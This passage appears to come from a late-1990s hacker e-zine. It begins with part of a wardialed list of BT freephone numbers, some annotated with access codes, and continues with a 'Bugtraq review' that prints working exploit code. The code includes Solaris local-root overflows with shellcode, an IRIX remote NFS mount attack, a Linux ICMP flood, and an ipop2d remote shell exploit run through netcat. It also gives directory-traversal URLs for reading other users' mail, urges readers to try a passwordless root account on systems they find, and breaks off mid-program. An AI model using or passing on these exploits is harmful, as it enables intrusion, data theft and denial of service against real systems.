651 [re-routed, Corpertate line service center, answerphone] 0800 672 652 [no answer] 0800 672 653 [BT customer service center, recording] 0800 672 654 [BT local goverment] 0800 672 655 [no answer] 0800 672 656 [no answer] 0800 672 657 [no answer] 0800 672 658 [BT local government] 0800 672 659 [no answer] 0800 672 660 [telecoms sales desk recording] 0800 672 661 ["] 0800 672 662 ["] 0800 672 663 ["] 0800 672 664 ["] 0800 672 665 ["] 0800 672 666 ["] 0800 672 667 ["] 0800 672 668 ["] 0800 672 669 ["] 0800 672 670 [no answer] 0800 672 671 [very strange, emits a tone, responds to DTMFs] 0800 672 672 [no answer] 0800 672 673 [dead] 0800 672 674 [dead] 0800 672 675 [modem/fax] 0800 672 676 [no answer] 0800 672 677 [no answer] 0800 672 678 [not recognised] 0800 672 679 [modem/fax] 0800 672 680 [dead] 0800 672 681 [BT number information line, * 2 digit passcode..] 0800 672 682 [dead] 0800 672 683 [no answer] 0800 672 684 [no answer] 0800 672 685 [busy] 0800 672 686 [no answer] 0800 672 687 [no answer] 0800 672 688 [not recognised] 0800 672 689 [no answer] 0800 672 690 [dead] 0800 672 691 [BT number information unit] 0800 672 692 [dead] 0800 672 693 [no answer] 0800 672 694 [no answer] 0800 672 695 [no answer] 0800 672 696 [no answer] 0800 672 697 [no answer] 0800 672 698 [no answer] 0800 672 699 [dead] 0800 672 700 [modem/fax] 0800 672 701 [re-routed, ans phone, * 3 digit sec code] 0800 672 702 [dead] 0800 672 703 [dead] 0800 672 704 [dead] 0800 672 705 [no answer] 0800 672 706 [dead] 0800 672 707 [Cellnet callback mesaging service] 0800 672 708 ["] 0800 672 709 [no answer] 0800 672 710 [no answer] 0800 672 711 ["hi, Birmingham"] 0800 672 712 [BT network services] 0800 672 713 [not rec] 0800 672 714 [not rec] 0800 672 715 [CIST] 0800 672 716 [not rec] 0800 672 717 [modem] 0800 672 718 [not rec] 0800 672 719 [no answer] 0800 672 720 [no answer] 0800 672 721 [dead] 0800 672 722 [no answer] 0800 672 723 [somthing managment center] 0800 672 724 [no answer] 0800 672 725 [dead] 0800 672 726 [not rec] ************************************************************************ 0800 672 727 [BT payphone automatic fault reporting system. For BT engineer dudes to request maintanance etc on payphones, requires 2 digit code (11) also fault code (10) etc] ************************************************************************ 0800 672 728 [no answer] 0800 672 729 [BT buisness connections] 0800 672 730 [Telecom red sales desk] 0800 672 731 ["] 0800 672 732 ["] 0800 672 733 ["] 0800 672 734 ["] 0800 672 735 ["] 0800 672 736 ["] 0800 672 737 ["] 0800 672 738 ["] 0800 672 739 ["] 0800 672 740 [no answer] 0800 672 741 [not rec] 0800 672 742 [dead] 0800 672 743 [no answer] 0800 672 744 [no answer] 0800 672 745 [no answer] 0800 672 746 [no answer] 0800 672 747 [no answer] 0800 672 748 [no answer] 0800 672 749 [no answer] 0800 672 750 [no answer] 0800 672 751 [dead] 0800 672 752 [answerphone] 0800 672 753 [dead] 0800 672 754 [production control team] 0800 672 755 [dead] 0800 672 756 [modem/fax] 0800 672 757 [dead] 0800 672 758 [not rec] 0800 672 759 [no answer] 0800 672 760 [dead] 0800 672 761 [BT residential repair service] 0800 672 762 [performance somthing] 0800 672 763 [dead] 0800 672 764 [dead] 0800 672 765 [dead] 0800 672 766 [dead] 0800 672 767 [dead] 0800 672 768 [dead] 0800 672 769 [dead] 0800 672 770 [BT buisness center] 0800 672 771 [no answer] 0800 672 772 [Cellnet direct] 0800 672 773 [0800 550 811 - changed] 0800 672 774 [modem/fax] 0800 672 775 [dead] 0800 672 776 [no answer] 0800 672 777 [HR and DS] 0800 672 778 [BT residential repair service] 0800 672 779 [direct to some womans Meridian Mail vmb. *81] 0800 672 780 [no answer] ************************************************************************ 0800 672 781 [HR and DS - !WARNING! - this is strange, on both these numbers it is not possible to terminate your call. Somhow the line is held open] ************************************************************************ 0800 672 782 [not rec] 0800 672 783 [no answer] 0800 672 784 [no answer] 0800 672 785 [no answer] 0800 672 786 [no answer] 0800 672 787 [no answer] 0800 672 788 [no answer] 0800 672 789 [no answer] 0800 672 790 [BT residential customer accounts service] 0800 672 791 [answerphone] 0800 672 792 [answerphone] 0800 672 793 [no answer] 0800 672 794 [no answer] 0800 672 795 [answerphone] 0800 672 796 [no answer] 0800 672 797 [no answer] 0800 672 798 [BT fax service. Meridian switch] 0800 672 799 [BT fax sercvie] 0800 672 800 [busy] 0800 672 801 [dead] 0800 672 802 [dead] 0800 672 803 [dead] 0800 672 804 [dead] 0800 672 805 [dead] 0800 672 806 [dead] 0800 672 807 [dead] 0800 672 808 [dead] 0800 672 809 [dead] 0800 672 810 [southapton buisness center] 0800 672 811 [BT corperate clients] 0800 672 812 [horsham center] 0800 672 813 [no answer] 0800 672 814 [no answer] 0800 672 815 [horsham buisness center] 0800 672 816 [no answer] 0800 672 817 [horsham center] 0800 672 818 [no answer] 0800 672 819 [no answer] 0800 672 820 [no answer] 0800 672 821 [no answer] 0800 672 822 [horsham center] 0800 672 823 [no answer] 0800 672 824 [no answer] 0800 672 825 [BT service center] 0800 672 826 [BT buisness center] 0800 672 827 [carrier] 0800 672 828 [not recognised] 0800 672 829 [no answer] 0800 672 830 [BT residential repair service] 0800 672 831 [dead] 0800 672 832 [dead] 0800 672 833 [dead] 0800 672 834 [dead] 0800 672 835 [no answer] 0800 672 836 [no answer] 0800 672 837 [no answer] 0800 672 838 [hello] 0800 672 839 [no answer] 0800 672 840 [6777 robert speaking] 0800 672 841 [no answer] 0800 672 842 [network managemnt center] 0800 672 843 [no answer] 0800 672 844 [dead] 0800 672 845 [BT voice-messaging] 0800 672 846 [BT voice-messaging] 0800 672 847 [no answer] 0800 672 848 [no answer] 0800 672 849 [no answer] 0800 672 850 [can i have the number you are reporting please?] 0800 672 851 [dead] 0800 672 852 [dead] 0800 672 853 [dead] 0800 672 854 [dead] 0800 672 855 [no answer] 0800 672 856 [nothing, then dead] 0800 672 857 [modem] 0800 672 858 [dead] 0800 672 859 [dead] 0800 672 860 [dead] 0800 672 861 [strange, internal dead tone] 0800 672 862 [not available] 0800 672 863 [hallo] 0800 672 864 [no answer] 0800 672 865 [modem] 0800 672 866 [no answer] 0800 672 867 [dead] 0800 672 868 [dead] 0800 672 869 [no answer] 0800 672 870 [telecom red sales desk] 0800 672 871 ["] 0800 672 872 ["] 0800 672 873 ["] 0800 672 874 ["] 0800 672 875 ["] 0800 672 876 ["] 0800 672 877 ["] 0800 672 878 ["] 0800 672 879 ["] 0800 672 880 [dead] 0800 672 881 [somthing buisness center] 0800 672 882 ["] 0800 672 883 ["] 0800 672 884 ["] 0800 672 885 [dead] 0800 672 886 [?] 0800 672 887 [modem] 0800 672 888 [dead] 0800 672 889 [dead] 0800 672 890 [dead] 0800 672 891 [no answer] 0800 672 892 [answerphone] 0800 672 893 [BT fax - BT-3] 0800 672 894 [answerphone] 0800 672 895 [answerphone] 0800 672 896 [answerphone] 0800 672 897 [BT fax service center] 0800 672 898 [This system will connect you to a BT office of your choice] 0800 672 899 [modem] 0800 672 900 [telecom red] 0800 672 901 ["] 0800 672 902 ["] 0800 672 903 ["] 0800 672 904 ["] 0800 672 905 ["] 0800 672 906 ["] 0800 672 907 ["] 0800 672 908 ["] 0800 672 909 ["] 0800 672 910 [business solutions] 0800 672 911 [no answer] 0800 672 912 [no answer] 0800 672 913 [no answer] 0800 672 914 [no answer] 0800 672 915 [no answer] 0800 672 916 [no answer] 0800 672 917 [no answer] 0800 672 918 [no answer] 0800 672 919 [no answer] 0800 672 920 [no answer] 0800 672 921 [query line] 0800 672 922 [no answer] 0800 672 923 [no answer] 0800 672 924 [no answer] 0800 672 925 [no answer] 0800 672 926 [no answer] 0800 672 927 [no answer] 0800 672 928 [no answer] 0800 672 929 [no answer] 0800 672 930 [dead] 0800 672 931 [no answer] 0800 672 932 [dead] 0800 672 933 [not recoginised] 0800 672 934 [hello, it's john] 0800 672 935 [no answer] 0800 672 936 [no answer] 0800 672 937 [southampton business center] 0800 672 938 [no answer] 0800 672 939 [no answer] 0800 672 940 [dead] 0800 672 941 [dead] 0800 672 942 [dead] 0800 672 943 [dead] 0800 672 944 [dead] 0800 672 945 [dead] 0800 672 946 [dead] 0800 672 947 [dead] 0800 672 948 [dead] 0800 672 949 [dead] 0800 672 950 [dead] 0800 672 951 [modem] 0800 672 952 [no answer] 0800 672 953 [modem] 0800 672 954 [no answer] 0800 672 955 [modem] 0800 672 956 [no answer] 0800 672 957 [modem] 0800 672 958 [no answer] 0800 672 959 [no answer] 0800 672 960 [no answer] 0800 672 961 [BT work manager center] 0800 672 962 [no answer] 0800 672 963 [BT workmanager center] 0800 672 964 [no answer] 0800 672 965 [BT workmanager center] 0800 672 966 ["] 0800 672 967 [no answer] 0800 672 968 [no answer] 0800 672 969 [no answer] 0800 672 970 [dead] 0800 672 971 [no answer] 0800 672 972 [no answer] 0800 672 973 [no answer] 0800 672 974 [no answer] 0800 672 975 [no answer] 0800 672 976 [no answer] 0800 672 977 [no answer] 0800 672 978 [no answer] 0800 672 979 [no answer] 0800 672 980 [no answer] 0800 672 981 [no answer] 0800 672 982 [no answer] 0800 672 983 [no answer] 0800 672 984 [dead] 0800 672 985 [Meridian mail] 0800 672 986 [no answer] 0800 672 987 [no answer] 0800 672 988 [no answer] 0800 672 989 [dead] 0800 672 990 [no answer] 0800 672 991 [modem] 0800 672 992 [dead] 0800 672 993 [not recognised] 0800 672 994 [no answer] 0800 672 995 [no answer] 0800 672 996 [no answer] 0800 672 997 [no answer] 0800 672 998 [no answer] 0800 672 999 [no answer] ********** -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ SUIDcyde ]:::::::::::::[OO--[ by bodie ]---[ bodi3@usa.net ]::::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Bugtraq review --------- *NOTE* all these bugs have not been varified by me, use them at your own risk --------- been an interesting time recently on bugtraq. A was found in IE4 which means that if someone tries to bookmark your site, they will not be able to access their browser any more The bug works because IE5 tries to download a file called favicon.ico from the a web site when a user bookmarks it. It uses this icon to display next to the site in the faverites list. The bug works when the file isn't of the correct format, IE5 crashes :) This means you can stop all those script kiddies from bookmarking your site by putting a file called favicon.ico (just open up a t-file and write hello or something) This will encourage some people to use netscape and generally piss off microshaft. And the best part is, it's totally legal :) --- Another bug that was revealed was in the installation program for openlinux 2.2. The problem lies in that, when it installs it inserts a user in the password file called 'help'. This account is meant to be used to rescue the system if it crashes during installation. Why they don't just use root i don't know, but the account stays there after installation with root privs and no password. So if ya see any OL systems around try that out. I've seen 1 so far and it worked like a dream (of course i notified the sysadmin of it straight away :)) --- Yet more buffer overflows, this one for dtprintinfo, root. This exploit code works on Intel edition of Solaris2.6 and Solaris 2.7, you may have to fiddle with the code to get it working on other versions. To get it working you will have to type this first /*======================================================================== ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) ======================================================================== */ static char x[1000]; #define ADJUST 0 #define STARTADR 621 #define BUFSIZE 900 #define NOP 0x90 unsigned long ret_adr; int i; char exploit_code[] = "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33" "\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88" "\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f" "\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46" "\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01" "\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__(" movl %esp,%eax "); } main() { putenv("LANG="); for (i=0;i> 8 ) &0xff; x[i+2]=(ret_adr >> 16 ) &0xff; x[i+3]=(ret_adr >> 24 ) &0xff; } x[BUFSIZE]=0; execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0); } --- another exploit is in the lpset command. This goes sorta like this /*=================================================================== ex_lpset.c Overflow Exploits( for Intel Edition ) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) ===================================================================== */ #define OFFSET 0x3b88 #define STARTADR 700 #define ENDADR 1200 #define EX_STADR 8000 #define BUFSIZE 22000 #define NOP 0x90 unsigned long ret_adr; int i,adjust; char exploit_code[] = "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff\x55" "\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33\xc0" "\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e" "\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3" "\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46\x08" "\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01\xe8" "\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__(" movl %esp,%eax "); } static char x[BUFSIZE]; main(int argc, char **argv) { memset(x,NOP,18000); ret_adr=get_sp()-OFFSET; printf("0 : x86 Solaris2.6 J\n1 : ?\n2 : ?\n3 : x86 Solaris 7 J\n"); printf("Input (0-3) : "); scanf("%d",&adjust); printf("Jumping Address = 0x%lx\n",ret_adr); for (i = adjust+STARTADR; i> 8 ) &0xff; x[i+0]=(ret_adr >> 16 ) &0xff; x[i+1]=(ret_adr >> 24 ) &0xff; } for (i=0;i> 8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } memcpy(x,EV,strlen(EV)); x[3000]=0; putenv(x); execl("/bin/passwd","passwd",(char *)0); } --- A lot of mail servers are now implementing web interfaces. This can be a problem whe usuffer holes like this. The following programs have these problems: CTMail: type: http://[server]:8002/../spool/username/mail.txt into your web browser and you can view the mail of the user FTGate: same as above except this seems to be a bit more reliable than the CTMail bug NTMail: This is even worse, it allows you to view any file on the system. Type: http://[server]:8000/../../../../../boot.ini. and your looking at boot.ini I'm sure u'll find nice ways of exploiting these bugs --- Yet more problems with IRIX comes in the nsd virtual file system. This allows local users to exploit root. Code coming: (sorry about the extended coments but i decided to include out of respect to the authour) /****************************************************************************** IRIX 6.5 nsd virtual filesystem exploit Author: Jefferson Ogata (JO317) Please note that this program comes with NO WARRANTY WHATSOEVER. Your use of this program constitutes your complete acceptance of all liability for any damage or loss caused by the aforesaid use. It is provided to the network community solely to document the existence of a vulnerability in the security implementations of certain versions of IRIX, and may not be used for any illicit purpose. Many of the details of the bug this program exploits have been available to users of SGI's online support system since February 1999. The current revision of IRIX (6.5.3) corrects this bug, at least enough to stop this particular exploit, and I strongly encourage you to bring your systems up to date as quickly as possible. With IRIX 6.5, SGI has moved all name services, NIS services, and DNS lookups into a userland process called nsd, which exports the results of the queries it fields into a virtual filesystem. The virtual filesystem is normally mounted onto the directory /ns by the program /sbin/nsmount, which is invoked by nsd on startup. The nsd daemon itself is exporting the filesystem via NFS3 over a dynamically bound UDP port -- rather than a well-known or settable one -- typically in the 1024-1029 range. On a desktop system, 1024 is a good bet, since nsd is usually the first RPC/UDP service to be started. The NFS filesystem is not registered with mountd, so there is no way to query mountd for a mount filehandle. But because the NFS port is fairly easy to discover through port scanning, and because the mount filehandle nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd filesystem from a host anywhere on the Internet. nsd will serve an array of NFS requests to anyone. Furthermore, because the service's NFS port is bound dynamically, it is difficult to protect it with a firewall; it may change from one system start to another, or if the daemon is killed and restarted. This program can successfully mount the nsd-exported virtual filesystem from a remote host onto a machine running IRIX 6.4 or higher. It makes use of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher. I do not know what this flag does at the NFS protocol level, but it allows the client to ask the NFS server not to enforce certain permissions controls against the client. I don't know whether any other vendor NFS client systems support this flag. A clever person might write a userland NFS client that would accept an initial handle, NFS port, etc. as arguments. On an SGI with SGI C compiler, compile with: cc -o nsdadv nsdadv.c Run it this way: nsdadv /mnt sucker.example.com 1024 with obvious substitutions. So what are the security implications of this? Well, at the very least, the nsd filesystem on an NIS server reveals the NIS domain name, and what maps it contains, as well as what classes are being used. By exploring the filesystem shortly after it has been mounted I have been able to retrieve data that should be hidden from me, including shadow password entries from a remote system's shadow file. Beyond retrieving keys and maps, you can also monitor the filesystem for changes. A great deal of information is leaked through the contents of the nsd filesystem. For example, if host A looks up a host B's IP address, a file named B will appear in the /.local/hosts.byname directory in A's nsd filesystem. The file's contents will be the IP address. By the way, though you be unable to chdir into a particular location in the nsd filesystem, you may yet succeed under slightly different conditions. Eventually you can do it. I'm not sure why or when, but nsd gets picky sometimes. Eventually it relents. Specifically, I've found that the entire nsd filesystem appears readable for a few seconds after it is initially mounted. If you can't look at something, unmount the filesystem, remount it, and try again immediately. It also seems that a stat() is sometimes required before a chdir(). Your mileage may vary, but keep trying. You may wish to write a script to mount the nsd filesystem, explore and take inventory of its contents, and unmount the filesystem quickly. Once you've chdir'd into a directory, it appears you can always read it, although you can't necessarily stat its contents. This suggests a strategy of spawning a group of processes each with its cwd set to a subdirectory of the nsd filesystem, in order to retain visibility on the entire filesystem. Each process would generate an inventory of its cwd, and then monitor it for changes. A Perl script could do this well. Another thing: it is possible to create an empty file in nsd's exported filesystem simply by stat()ing a nonexistent filename. This suggests a potential DoS by creating many files in a directory. Remember that the system keeps a local cache in /var/ns, so you may have to wait for cached entries on the target host to expire before you'll see them reappear in the virtual filesystem. For some fairly extensive info on the nsd implementation, take a look at: http://www.bitmover.com/lm/lamed_arch.html ****** What got me into all this was that I found I could no longer run services chrooted if they required DNS. It took considerable effort to come up with a solution to this. This was a fundamental change from IRIX 6.4, and I know I'm not the only one who finds the nsd implementation to be a generally unpleasant direction, in part because it causes umount -t nfs to break system database services. I give SGI points for creativity -- in one sense, using NFS as a database access system is a very slick approach. But the database needs a security model, and the model needs to be implemented correctly. Neither of these needs appears to have been met. So how could SGI fix this? Without going back, SGI could at least make nsd respond only to queries from localhost (see note below about IRIX 6.5.3). The problem here is that they actually intend to support remote mounts in later releases, in order to supplement or supplant other means of distribution. The web documents indicate this. They could create a well-randomized mount filehandle for the filesystem and pass that to nsmount. Then you couldn't remotely mount the filesystem without guessing the handle -- nontrivial with a 32-byte handle. At the very least, they should provide libraries of regular BIND resolver routines, file-based getpwent, etc. routines, so one could choose the resolution strategy at link time, perhaps by modifying the shared library path. ****** With IRIX release 6.5.3, SGI appears to have fixed this problem, at least to some degree. The exploit does not appear to work as it does against 6.5.2. Further testing is needed, and the behavior should be watched carefully in future versions of IRIX. ****************************************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* Filesystem type name for nsd-exported filesystem. */ #define NSD_FSTYPE "nfs3" /* File the records mounted filesystems. */ #define MTAB_FILE "/etc/mtab" /* Socket address we'll fill in with our destination IP and port. */ struct sockaddr_in sin; /* All zero file handle. This appears to be the base handle for the nsd filesystem. Great security, huh? */ unsigned char fh[NFS_FHSIZE] = { 0 }; /* NFS mount options structure to pass to mount(2). The meanings of these are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The flags field indicates that this is a soft mount without log messages, and to set the initial timeout and number of retries from fields in this structure. The fh field is a pointer to the filehandle of the mount point, whose size is set by fh_len. As noted above, the mount point filehandle is just 32 zeroes. */ struct nfs_args nx = { &sin, /* addr */ (fhandle_t *) fh, /* fh */ NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC, /* flags */ 0, /* wsize */ 0, /* rsize */ 100, /* timeo */ 2, /* retrans */ 0, /* hostname */ 0, /* acregmin */ 0, /* acregmax */ 0, /* acdirmin */ 0, /* acdirmax */ 0, /* symttl */ { 0 }, /* base */ 0, /* namemax */ NFS_FHSIZE, /* fh_len */ /* On IRIX 6.4 and up there are also the following... */ /* bdsauto */ /* bdswindow */ /* On IRIX 6.5 there are also the following... */ /* bdsbuflen */ /* pid */ /* maxthreads */ }; void usage (void) { fprintf (stderr, "usage: nsmount_remote directory host port\n\n"); fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on via NSD daemon\n"); fprintf (stderr, "port onto .\n\n"); exit (1); } int main (int argc, char **argv) { char *dir; char *host; char *ports; int port; struct hostent *h; int fstype; FILE *mtabf; struct mntent mnt = { 0, 0, NSD_FSTYPE, "soft,timeo=100,retrans=2", 0, 0, }; if (argc != 4) usage (); dir = argv[1]; host = argv[2]; port = atoi ((ports = argv[3])); /* Prepare for host lookup. */ memset ((void *) &sin, 0, sizeof (sin)); sin.sin_family = 2; sin.sin_port = port; /* Look up the host. */ if (inet_aton (host, &sin.sin_addr)) ; else if ((h = gethostbyname (host))) { unsigned long *l = (unsigned long *) *(h->h_addr_list); sin.sin_addr.s_addr = l[0]; } else { fprintf (stderr, "Cannot resolve host %s.\n", host); return 1; } /* Get filesystem type index for nsd filesystem type. */ if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0) { perror ("sysfs (" NSD_FSTYPE ")"); return 1; } fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n", host, inet_ntoa (sin.sin_addr), port, dir); /* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR means "tell server to trust us with attributes" and MS_DATA means "6-argument mount". MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't seem to work without this option. So even though this program will compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to attack nsd. */ if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx)) != 0) { perror ("mount"); return 1; } /* Record mount point in /etc/mtab. */ mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1); sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports); mnt.mnt_dir = dir; if (!(mtabf = setmntent (MTAB_FILE, "r+"))) { perror ("setmntent"); return 1; } if (addmntent (mtabf, &mnt) < 0) { perror ("addmntent"); return 1; } if (endmntent (mtabf) < 0) { perror ("endmntent"); return 1; } return 0; } --- Microshaft are not having a good time (do they ever?). Another bug in IE5 was discovered. Put the following code into your web page to freeze IE and stop script kiddies viewing your web site -----cut here----- -----cut here----- This will put the background colour in an infinite loop and freeze IE --- Linux kernel 2.2.x seems to get into an awful mess when it is sent a large number of some types of ICMP packages. To exploit this bug, use this: #include #include #include #include #include #include #include #include #include #include #include #include struct icmp_hdr { struct iphdr iph; struct icmp icp; char text[1002]; } icmph; int in_cksum(int *ptr, int nbytes) { long sum; u_short oddbyte, answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *)&oddbyte) = *(u_char *)ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } struct sockaddr_in sock_open(char *address, int socket, int prt) { struct hostent *host; if ((host = gethostbyname(address)) == NULL) { perror("Unable to get host name"); exit(-1); } struct sockaddr_in sin; bzero((char *)&sin, sizeof(sin)); sin.sin_family = PF_INET; sin.sin_port = htons(prt); bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length); return(sin); } void main(int argc, char **argv) { int sock, i, ctr, k; int on = 1; struct sockaddr_in addrs; if (argc < 3) { printf("Usage: %s \n", argv[0]); exit(-1); } for (i = 0; i < 1002; i++) { icmph.text[i] = random() % 255; } sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("Can't set IP_HDRINCL option on socket"); } if (sock < 0) { exit(-1); } fflush(stdout); for (ctr = 0;ctr < 1001;ctr++) { ctr = ctr % 1000; addrs = sock_open(argv[1], sock, atoi(argv[2])); icmph.iph.version = 4; icmph.iph.ihl = 6; icmph.iph.tot_len = 1024; icmph.iph.id = htons(0x001); icmph.iph.ttl = 255; icmph.iph.protocol = IPPROTO_ICMP; icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) + ((random() % 255) * 65535) + ((random() % 255) * 255) + (random() % 255); icmph.iph.daddr = addrs.sin_addr.s_addr; icmph.iph.frag_off = htons(0); icmph.icp.icmp_type = random() % 14; icmph.icp.icmp_code = random() % 10; icmph.icp.icmp_cksum = 0; icmph.icp.icmp_id = 2650; icmph.icp.icmp_seq = random() % 255; icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024); if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1) { if (errno != ENOBUFS) printf("X"); } if (ctr == 0) printf("b00m "); fflush(stdout); } close(sock); } --- Another one of those rare jewls came out earlier this month: a remote root exploit. This time in ipop2d. use well: ---- SDI-pop2.c ------------------ /* * Sekure SDI (Brazilian Information Security Team) * ipop2d remote exploit for linux (Jun, 02 1999) * * by c0nd0r * * (read the instructions below) * * Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr, * falcon, vader, c_orb, marty(nordo!) and minha malinha! * also to #uground (irc.brasnet.org) and #SDI (efnet), * guys at el8.org, toxyn.org, pulhas.org * * Sincere Apologizes: duke (for the mistake we made with the wu-expl), * your code rocks. * * Usage: * * SDI-pop2 [offset] * * where imap_server = IMAP server at your box (or other place as well) * user = any account at your box * pass = the account's password * offset = 0 is default -- increase if it's necessary. * * Example: (netcat rocks) * * (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109 * * ---------------------------------------------------------------- * HOWTO-exploit: * * In order to gain remote access as user nobody, you should set * an IMAP server at your box (just edit the inetd.conf) or at * any other machine which you have an account. * * During the anonymous_login() function, the ipop2d will set the * uid to user nobody, so you are not going to get a rootshell. * ---------------------------------------------------------------- * * We do NOT take any responsability for the consequences of using * this code -- you've been warned! don't be a script k1dd13! * */ #include /* * (shellcode) * * jmp 0x1f * popl %esi * movl %esi,0x8(%esi) * xorl %eax,%eax * movb %eax,0x7(%esi) * movl %eax,0xc(%esi) * movb $0xb,%al * movl %esi,%ebx * leal 0x8(%esi),%ecx * leal 0xc(%esi),%edx * int $0x80 * xorl %ebx,%ebx * movl %ebx,%eax * inc %eax * int $0x80 * call -0x24 * .string \"/bin/sh\" * grab your shellcode generator at www.sekure.org */ char c0d3[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff/bin/sh"; main (int argc, char *argv[] ) { char buf[2500]; int x,y=1000, offset=0; long addr; char host[255], user[255], pass[255]; int bsize=986; if ( argc < 4) { printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n"); printf ( "usage: (SDI-pop2 [offset];cat) | nc lame.org 109\n"); exit (0); } snprintf ( host, sizeof(host), "%s", argv[1]); snprintf ( user, sizeof(user), "%s", argv[2]); snprintf ( pass, sizeof(pass), "%s", argv[3]); if ( argc > 4) offset = atoi ( argv[4]); /* gimme the ret + offset */ addr = 0xbffff3c0 + offset; fprintf ( stderr, "0wning data since 0x%x\n\n", addr); /* calculation of the return address position */ bsize -= strlen ( host); for ( x = 0; x < bsize-strlen(c0d3); x++) buf[x] = 0x90; for ( y = 0; y < strlen(c0d3); x++, y++) buf[x] = c0d3[y]; for ( ; x < 1012; x+=4) { buf[x ] = addr & 0x000000ff; buf[x+1] = (addr & 0x0000ff00) >> 8; buf[x+2] = (addr & 0x00ff0000) >> 16; buf[x+3] = (addr & 0xff000000) >> 24; } sleep (1); printf ( "HELO %s:%s %s\r\n", host, user, pass); sleep (1); printf ( "FOLD %s\r\n", buf); } ----- EOF --------------------- --- More problems in windoze9x, nt and all other versions at the moment, comes in the handling of files named prn.* Because in old versions of DOS, this was reserved as a way of accessing the printer, it will not let you create any files named prn.* This is o.k, becuase windows won't let you create a file with that name in any aplication. The problem, as usual with microshaft products comes in the implementation of networking. If you are able to access a file on a remote computer you can rename it to prn, and it will be unremoveable. This will only work if you access the remote computer using //computer/drive/* it will not work if you map a network drive to your computer. This could be a nasty flaw if someone done something like this: (talking DOS now) rename //computer/c/program files //computer/c/prn this would mean that the owner of the computer could not access, rename or delete his program files directory and would probably lose all the data in the directory. The only solution so far for this problem seems to be by using postix (a unix emulator for windows) to remove the file. Unix to the rescue once again. --- A few weeks ago MIRC 5.6 was released. This contains a serious vulnerability in that if you mention a url in a window, mirc will automaticly tell your browser to go to that page, oh no, more people with banners and this time you can't stop it from opening up your web browser and telling it to access the site. --- Any of you code kiddies out there want to crash and NT workstation? A nice little vulnerability that runs a large number of threads can crash it, and you won't be able to bring up the task manager. Here is the code: /* * frootcake.c * kiva@wookey.org * * this tests NT at coping with *really dodgy* code... * it totally brings my SMP box to being 